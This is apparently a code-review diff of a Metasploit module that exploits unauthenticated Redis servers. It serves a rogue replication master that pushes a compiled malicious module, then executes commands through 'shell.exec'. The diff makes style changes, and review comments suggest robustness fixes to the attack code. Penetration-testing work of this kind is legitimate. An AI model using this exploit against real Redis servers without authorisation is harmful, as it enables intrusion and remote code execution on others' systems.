diff --git a/modules/exploits/linux/redis/redis_unauth_exec.rb b/modules/exploits/linux/redis/redis_unauth_exec.rb
index 4375e4fc0f3f..85087743d488 100644
--- a/modules/exploits/linux/redis/redis_unauth_exec.rb
+++ b/modules/exploits/linux/redis/redis_unauth_exec.rb
@@ -89,12 +89,12 @@ def exploit
 @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8)
 @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
 else
- @module_init_name = "shell"
- @module_cmd = "shell.exec"
+ @module_init_name = 'shell'
+ @module_cmd = 'shell.exec'
 end
- if srvhost == "0.0.0.0"
- fail_with(Failure::BadConfig, "Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.")
+ if srvhost == '0.0.0.0'
+ fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
 end
 #
@@ -148,37 +148,37 @@ def start_rogue_server
 socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
 print_status("Listening on #{srvhost}:#{srvport}")
 rsock = socket.accept()
- vprint_status("Accepted a connection")
+ vprint_status('Accepted a connection')
 # Start negotiation
 while true
 request = rsock.read(1024)
- vprint_status("in<<< "+request.inspect)
+ vprint_status("in<<< #{request.inspect}")
 response = ""
 finish = false
 case
- when request.include?("PING")
+ when request.include?('PING')
 response = "+PONG\r\n"
- when request.include?("REPLCONF")
+ when request.include?('REPLCONF')
 response = "+OK\r\n"
- when request.include?("PSYNC") || request.include?("SYNC")
- response = "+FULLRESYNC " + 'Z'*40 + " 1\r\n"
+ when request.include?('PSYNC') || request.include?('SYNC')
+ response = "+FULLRESYNC #{'Z'*40} 1\r\n"
 response << "$#{payload_bin.length}\r\n"
 response << "#{payload_bin}\r\n"
 finish = true
 end
 if response.length < 200
- vprint_status("out>>> "+response.inspect)
+ vprint_status("out>>> #{response.inspect}")
 else
- vprint_status("out>>> "+response.inspect[0..100]+ "......" + response.inspect[-100..-1])
+ vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
 end
 rsock.put(response)
 if finish
- print_status("Rogue server close...")
+ print_status('Rogue server close...')
 rsock.close()
 socket.close()
 break
@@ -199,7 +199,7 @@ def pull_the_trigger
 # And the command of module is hard-coded.
 #
 def execute_command(cmd, opts = {})
- redis_command("shell.exec","#{cmd.to_s}") rescue nil
+ redis_command('shell.exec',"#{cmd.to_s}") rescue nil
 end
 #
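Review bot: The new `when request.include?('PING')` branch and the ones after it assume `rsock.read(1024)` always returns a String. If the peer closes the connection first, `read` may return nil (to be confirmed for Rex sockets), and the first `when` then raises NoMethodError with both `rsock` and `socket` left open. A guard right after the read, such as `break if request.nil? || request.empty?`, together with closing both sockets in an `ensure`, would let the listener exit cleanly and release the port. Separately, `request.include?('PSYNC') || request.include?('SYNC')` is redundant, since any string containing PSYNC also contains SYNC. start_rogue_server begins and ends outside this hunk.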
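Review bot: The rewritten call in execute_command still ends in the inline `rescue nil`, which discards every StandardError raised by redis_command. A dropped connection or a protocol error is therefore indistinguishable from a successful command in the module output. Use a `begin`/`rescue` that names the expected exception class (whichever redis_command actually raises; not visible here) and reports it with `vprint_error(e.message)`. The quote cleanup also left the redundant interpolation `"#{cmd.to_s}"`, which can simply be `cmd.to_s`.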
@@ -216,13 +216,13 @@ def compile_payload
 vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
 vprint_status(%x|make -C #{File.dirname(make_file)} clean|)
- print_status("Compile redis module extension file")
+ print_status('Compile redis module extension file')
 res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
- if res.include? "true"
- print_good("Payload #{} generate successful! ")
+ if res.include? 'true'
+ print_good("Payload generated successfully! ")
 else
 print_error(res)
- fail_with(Failure::BadConfig, "Check config of gcc compiler.")
+ fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
 end
 end
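Review bot: `if res.include? 'true'` treats any occurrence of the substring "true" in make's output as success, so a compiler message or directory name containing that word can report a failed build as a good payload. Checking the exit status is more reliable: drop `&& echo true` and test `$?.success?` right after the `%x` call. The `%x|make -C #{File.dirname(make_file)} ...|` lines also interpolate a filesystem path into a shell string; if that path can contain spaces or shell metacharacters, `Shellwords.escape` or an argv-style `Open3.capture2e('make', '-C', dir, '-f', make_file)` avoids misparsing. The touched `print_good` string still uses double quotes and a trailing space, unlike the rest of this cleanup. compile_payload starts outside the hunk.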